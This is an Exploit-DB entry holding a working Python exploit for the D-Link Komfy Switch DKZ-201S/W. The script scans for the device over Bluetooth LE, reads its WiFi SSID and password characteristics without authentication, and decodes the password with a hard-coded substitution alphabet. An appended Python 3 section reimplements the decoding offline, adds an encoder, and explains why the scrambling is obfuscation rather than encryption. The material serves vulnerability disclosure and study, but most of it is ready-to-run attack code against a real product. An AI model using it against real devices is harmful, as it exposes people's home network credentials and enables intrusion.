Komfy Switch with Camera DKZ-201S/W – WiFi Password Disclosure

  • Author: Jason Doyle
    Date: 2016-10-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40633/
#!/usr/bin/python
# Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
# Date: Oct 13, 2016
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
# HW Model: DKZ-201S/W
# SW Version: 1.0
# Tested on: Ubuntu 16.04 LTS / Python 2.7
# Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
#                      10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.

# Vulnerability Summary
# It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's
# associated wifi SSID and password over Bluetooth (4.0/BLE).

# Vulnerability Details
# https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure

# Author: Jason Doyle @_jasondoyle
# Komfy Switch with Camera wifi password disclosure exploit script
import sys
import re, base64
from bluepy.btle import Scanner
from gattlib import GATTRequester

# Lookup table to unscramble: the device stores the password as standard base64 with a
# permuted alphabet. Position i in komfy64Alphabet stands for position i in base64Alphabet.
base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="  # '=' used for padding
komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$"  # '$' used for padding

scanner = Scanner()

# Scan for 5 seconds. A Komfy switch is picked out by its MAC prefix and by its advertisement
# carrying Flags (AD type 1), a complete list of 128-bit service UUIDs (AD type 7) and a
# complete local name (AD type 9).
devices = scanner.scan(5.0)
bAddr = ""
for dev in devices:
    if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
        bAddr = dev.addr
        print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
if not bAddr:
    print "No Komfy switches found"
    sys.exit(1)

# Connect through hci0 with security level 'none': the characteristics below are readable
# without pairing or any other authentication.
req = GATTRequester(bAddr.encode('ascii', 'ignore'), False, 'hci0')
req.connect(True, 'public', 'none', 0, 78)

# Request SSID. The characteristic value holds the field as a quoted string after ': ';
# pull out the quoted part and drop any backslash escapes.
wifiSsid = req.read_by_uuid("0xb006")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
wifiSsid = reg.groups()[1].replace("\\", "")

# Request Komfy-encoded wifi password, same value format
wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
wifiPassKomfy64 = reg.groups()[1].replace("\\", "")

# Convert password to real base64: each character is replaced by the character at the
# same position in the standard alphabet, then the result is decoded normally.
wifiPassBase64 = ""
for char in wifiPassKomfy64:
    i = komfy64Alphabet.index(char)
    wifiPassBase64 += base64Alphabet[i]

wifiPass = base64.b64decode(wifiPassBase64)
print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)
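The exploit's unscrambling step is a fixed single-character substitution over the base64 alphabet, so anyone holding the two tables can decode a captured characteristic value offline. The following is an added example, not part of the exploit or the author's repository, that isolates that decoding in Python 3 so it can be run without a radio: it reuses the two alphabets and the quoted-field regex from the script above, validates input instead of crashing on unexpected bytes, and includes an encoder built by inverting the same table. The encoder, the helper names, and the `{"ssid": "..."}` / `{"pwd": "..."}` sample payloads are assumptions made here for testing; the page only establishes that the field follows `: "`.

```python
import base64
import re

# Tables as published in the exploit script: position i in KOMFY64 stands for position i in BASE64.
BASE64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
KOMFY64 = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$"

assert len(BASE64) == len(KOMFY64) == 65  # one-to-one substitution, padding char included

_K2B = str.maketrans(KOMFY64, BASE64)  # decode direction (what the exploit does)
_B2K = str.maketrans(BASE64, KOMFY64)  # encode direction (assumed inverse, used to build test data)

# Same pattern the exploit applies to the raw characteristic value.
_QUOTED = re.compile(r':\s"(.*)"')


def extract_quoted_value(raw):
    """Pull the quoted field out of a characteristic value such as '{"ssid": "HomeNet"}'.

    Mirrors the exploit's regex and its stripping of backslash escapes, but raises a
    ValueError when no field is present instead of failing on a None match.
    """
    m = _QUOTED.search(raw)
    if m is None:
        raise ValueError("no quoted field in characteristic value: %r" % raw)
    return m.group(1).replace("\\", "")


def komfy64_to_base64(s):
    """Map a Komfy-alphabet string back to standard base64, rejecting out-of-alphabet characters."""
    bad = set(s) - set(KOMFY64)
    if bad:
        raise ValueError("characters outside the Komfy alphabet: %s" % sorted(bad))
    return s.translate(_K2B)


def decode_komfy_password(encoded):
    """Komfy64 -> base64 -> bytes -> text; validate=True rejects malformed base64 after the remap."""
    b64 = komfy64_to_base64(encoded)
    return base64.b64decode(b64, validate=True).decode("utf-8")


def encode_komfy_password(plaintext):
    """Inverse of decode_komfy_password, derived from the same table (assumption, not from the page)."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return b64.translate(_B2K)


def recover_credentials(ssid_raw, pwd_raw):
    """Given the raw values of the two characteristics (0xb006 and 0xb007 in the exploit),
    return (ssid, password) as the exploit would print them."""
    return extract_quoted_value(ssid_raw), decode_komfy_password(extract_quoted_value(pwd_raw))


# Constructed sample values in the shape the exploit's regex expects. The real payload
# format is not documented on this page beyond the field sitting after ': "'.
SAMPLE_SSID_RAW = '{"ssid": "HomeNet"}'
SAMPLE_PWD_RAW = '{"pwd": "%s"}' % encode_komfy_password("hunter2!")

if __name__ == "__main__":
    ssid, pwd = recover_credentials(SAMPLE_SSID_RAW, SAMPLE_PWD_RAW)
    print("SSID: %s  Password: %s" % (ssid, pwd))
```

Because the mapping is a static permutation shipped in the firmware and applied to every device, it adds no secrecy: it is obfuscation rather than encryption, and the only control that would have mattered is requiring pairing or an authenticated link before the characteristic can be read.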